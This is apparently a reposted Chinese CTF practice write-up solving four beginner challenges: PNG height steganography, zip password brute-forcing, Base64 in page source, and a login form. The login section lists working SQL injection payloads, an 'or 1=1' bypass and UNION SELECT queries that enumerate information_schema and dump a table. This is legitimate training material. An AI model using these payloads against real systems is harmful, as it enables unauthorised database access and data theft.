CTF练习week02

1. 大白

在这里插入图片描述
下载附件
在这里插入图片描述
发现图片不完整,应该进行了隐写
用winhex打开图片,第二行前四位为宽,后四位为高
在这里插入图片描述
图片不完整,我们修改高度将 00 00 01 00改为00 00 02 00
在这里插入图片描述
保存后,打开图片
在这里插入图片描述

2. 基础破解

在这里插入图片描述
下载附件
在这里插入图片描述
题目提示是4位数字加密,进行暴力破解,口令为2563
在这里插入图片描述
输入密码解压,打开文件
在这里插入图片描述
Base64解密
在这里插入图片描述

3. web签到题

打开网址
在这里插入图片描述
查看源代码,发现了一串字符串
在这里插入图片描述
猜测应该是Base64,解密可得flag
在这里插入图片描述

4. wb2

在这里插入图片描述
看了一下hint,本题的考查点是基本的SQL注入和表联合查询

1.用万能密码 ’ or 1=1 #,登陆成功
在这里插入图片描述
2.判断列数
order by 3 页面回显正常,order by 4无回显

username=ctfshow' order by 3 #&password=123456
username=ctfshow' order by 4 #&password=123456

接下来的步骤就是爆库,爆表,爆字段,爆值
3.爆库名

username=ctfshow' union select 1 ,database(),3 #&password= 123456

在这里插入图片描述
4.爆表

username=ctfshow' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() #&password=123456

在这里插入图片描述
5.爆字段

username=ctfshow' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'#&password=123456

在这里插入图片描述
6.爆值

username=ctfshow' union select 1,group_concat(flag),3 from flag #&password=123456

在这里插入图片描述

table_schema:数据库名
table_name: 具体的表名
column_name: 列名
information_schema.schemata:包含所有数据库的名
information_schema.tables:包含所有库的表名
information_schema.columns:包含所有表的字段
group_concat()函数功能:将group by产生的同一个分组中的值连接起来,返回一个字符串结果。

猜你喜欢

转载自blog.csdn.net/qq_46150940/article/details/107322456